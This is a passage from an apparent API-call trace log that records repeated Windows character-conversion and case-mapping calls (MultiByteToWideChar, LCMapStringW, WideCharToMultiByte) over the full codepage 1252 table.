dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0159.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0159.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x18f770, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ") returned 256 [0159.165] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0159.165] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpDestStr=0x18f570, cchDest=256 | out: lpDestStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x161\x2039\x153\x8d\x17e\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x623c\x49\x100") returned 256 [0159.165] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x161\x2039\x153\x8d\x17e\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x623c\x49\x100", cchWideChar=256, lpMultiByteStr=0x18fcf0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x01", lpUsedDefaultChar=0x0) returned 256 [0159.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0159.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x18f750, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ") returned 256 [0159.177] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0159.177] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpDestStr=0x18f550, cchDest=256 | out: lpDestStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x191\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x160\x203a\x152\x9d\x17d\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x178\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x623c\x49\x100") returned 256 [0159.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x191\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x160\x203a\x152\x9d\x17d\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x178\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x623c\x49\x100", cchWideChar=256, lpMultiByteStr=0x18fbf0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6